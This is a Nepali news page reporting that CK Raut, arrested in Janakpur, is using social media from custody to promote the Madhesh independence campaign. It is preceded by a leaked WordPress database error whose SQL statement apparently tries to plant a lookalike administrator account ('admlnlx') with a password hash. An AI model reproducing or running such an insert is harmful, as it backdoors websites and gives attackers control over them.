WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B0xggYxQz0kCBjPi8cw5bmirmWX73j1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-03 22:41:46', '', 'admlnlx', 'admlnlx')
काठमाडौं,माघ २१ –
देश विखण्डनको अभियान चलाउँदै आएका सीके राउतले हिरासतबाटै सामाजिक सञ्जाल प्रयोग गरिरहेका छन् । राज्य विप्लवको मुद्दा चलाउने तयारी गरिरहेका सीकेलाई हिरासतमै रहेर सामाजिक सञ्जाल प्रयोग गर्न छुट दिइएको छ ।
विहीबार जनकपुरबाट पक्रउ गरिएका राउतले हिरासतमै रहेर सामाजिक सञ्जालबाट स्वतन्त्र मधेस अभियानको प्रचारप्रसार गरिरहेका छन् । उनले सामाजिक सञ्जालबाट शान्तिपूर्ण प्रदर्शन गर्न भन्दै आफ्ना कार्यकर्ताहरुलाई आह्वान गरिरहेका छन् ।
पक्राउ परेदेखि नै उनले आफ्नो अनलाइन न्यूजपोर्टलमा प्रकाशित समाचारका लिंकहरु ट्वीटर र फेसबुकमा पोष्ट गरिरहेका छन् भने आन्दोलनमा उत्रिन आह्वान गरेका छन् । उनले सरकारको कदमको पनि आलोचना गरिरहेका छन् ।
देश विखण्डनकाे अभियान चलाउँदै अाएको भन्दै राउतलार्इ प्रहरीले विहीबार जनकपुरबाट पक्राउ गरेको थियो । 
